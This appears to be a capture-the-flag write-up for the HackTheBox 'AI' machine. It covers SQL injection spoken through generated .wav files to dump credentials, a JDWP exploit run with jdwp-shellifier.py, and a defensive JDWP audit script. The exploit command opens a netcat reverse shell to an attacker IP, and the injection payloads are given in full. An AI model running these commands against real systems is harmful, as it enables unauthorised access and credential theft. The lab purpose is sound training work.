AI
The Basics
The first thing we should do is map the box IP address to the box name with the .htb suffix in the /etc/hosts file:
10.10.10.163 ai.htb
Initial Scan
Next up we will run an all-port Nmap scan: nmap -sC -sV -p- 10.10.10.163. We get results back for two open ports: 22 (SSH) and 80 (HTTP).
Web Enumeration
Let’s take a look at port 80 and run gobuster against it.
We quickly get some promising results. We’ll take a look at ai.php and intelligence.php. It looks like we have some upload functionality for .wav files, and the AI will process an uploaded .wav file into a search query. Looking at the intelligence page, we can get an overview of some commands and their results after processing by the AI. The page also hints at Microsoft and a male US voice model. After some googling I found a free Text-To-Speech service with a male US voice model and an extended Speech-To-Text table.
Generating wav files to dump credentials from the MySQL database
The speech-to-text table contains output that strongly hints at SQL injection, like union, schema, comma, period and -- -. So let’s generate a .wav file and test this.
We generate single-quote.wav, which contains “open single quote”; this should result in a single quote after processing by the AI.
Next up let’s try dumping credentials. We generate username.wav and password.wav which contain:
open single quote union select yusername from users comment database
open single quote union selectpassword from users comment database
To make sure the AI parses our commands correctly we have to play around with the speed, spacing and spelling.
We successfully extract a username and password.
User flag and enumeration
With our credentials, we can SSH into the box as the user and grab the user flag: ssh al***@ai.htb.
For the next part we will do some heavy enumeration. We run the following scripts (linpeas.sh and pspy64) and go through the output to look for anything of interest:
Looking at the running processes in the linpeas.sh output we can see that -agentlib:jdwp is flagged with a 99% PE (privilege escalation) rating.
Monitoring with pspy64 we see some interesting output regarding /root/tomcat.sh, which seems to be killing and restarting a Tomcat instance; that restart spawns the same process which was flagged by linpeas.
If we take a look at the network connections and listeners with netstat -auntp we see localhost is listening on ports 8000, 8080, 8005 and 8009. From the previous output we know the Tomcat server’s JDWP debug port is 8000.
Exploiting JDWP to gain a root shell
The Java Debug Wire Protocol (JDWP) enables remote debugging of Java applications with the Java Debugger (JDB). Googling for a JDWP exploit will find us a GitHub repository with a JDWP exploitation script called jdwp-shellifier.py.
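As an added defensive check (my own code, not part of the original writeup or the jdwp-shellifier project), the following Python script audits a process listing for JVMs started with the JDWP agent, the same flag linpeas highlighted above, and classifies the exposure by bind address and owning user. The ps lines it parses are constructed sample input, not output captured from the box.

```python
# Audit a `ps -eo user,pid,args` listing for JVMs started with a JDWP agent.
import re
from collections import namedtuple
# Constructed sample listing (not output captured from the box).
SAMPLE_PS = """\
USER       PID ARGS
root       911 /usr/bin/java -agentlib:jdwp=transport=dt_socket,address=localhost:8000,server=y,suspend=n -classpath /opt/tomcat/bin/bootstrap.jar org.apache.catalina.startup.Bootstrap start
tomcat    1204 /usr/bin/java -agentlib:jdwp=transport=dt_socket,server=y,suspend=n,address=*:5005 -jar /srv/app.jar
dev       1500 /usr/bin/java -Xrunjdwp:transport=dt_socket,address=127.0.0.1:5006,server=y,suspend=n -jar /srv/dev.jar
alexa     1388 /usr/bin/java -jar /home/alexa/tool.jar
"""

# Matches both the modern -agentlib:jdwp=... and the legacy -Xrunjdwp:... forms.
JDWP_RE = re.compile(r"-(?:agentlib:jdwp=|Xrunjdwp:)(\S+)")
LOOPBACK = {"localhost", "127.0.0.1", "::1", "[::1]"}
WILDCARD = {"*", "0.0.0.0", "::", "[::]"}

# bind is "loopback", "all", "port-only" or "other"; risk is "critical" or "high".
JdwpFinding = namedtuple("JdwpFinding", "user pid address bind risk")

def classify_address(address: str) -> str:
    """Classify the JDWP address= option by the interface it binds to."""
    host, sep, _port = address.rpartition(":")
    if not sep:
        # Bare port: JDK 9+ binds loopback only, JDK 8 and older bind all interfaces.
        return "port-only"
    if host in LOOPBACK:
        return "loopback"
    return "all" if host in WILDCARD else "other"

def audit_ps(ps_text: str) -> list:
    """One finding per JDWP-enabled process; loopback-only listeners still count,
    since a local user who can reach the port can run code as the JVM's owner."""
    findings = []
    for line in ps_text.splitlines()[1:]:  # skip the header row
        parts = line.split(None, 2)
        if len(parts) < 3:
            continue
        user, pid, args = parts
        match = JDWP_RE.search(args)
        if not match:
            continue
        opts = dict(kv.split("=", 1) for kv in match.group(1).split(",") if "=" in kv)
        address = opts.get("address", "")
        bind = classify_address(address)
        # Root-owned JVMs and non-loopback listeners are the worst case.
        risk = "critical" if user == "root" or bind != "loopback" else "high"
        findings.append(JdwpFinding(user, int(pid), address, bind, risk))
    return findings
```

On a real host, feed it the output of `ps -eo user,pid,args`; the fix for any finding is to remove the agent flag from the service's startup options rather than to firewall the port.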
Because the default netcat binary on the box doesn’t support the -e flag, we will upload our own /usr/bin/nc to /tmp, along with the jdwp-shellifier.py script.
Before we run the script we will set up a listener with nc -lnvp 444. Now we can run the exploit:
./jdwp-shellifier.py -t 127.0.0.1 -p 8000 --break-on 'java.lang.String.indexOf' --cmd '/tmp/nc 10.10.14.XXX 444 -e /bin/bash'
We successfully get a connection back and can upgrade our shell using Python:
python -c "import pty;pty.spawn('/bin/bash')"
export TERM=xterm
Now we can grab the root flag.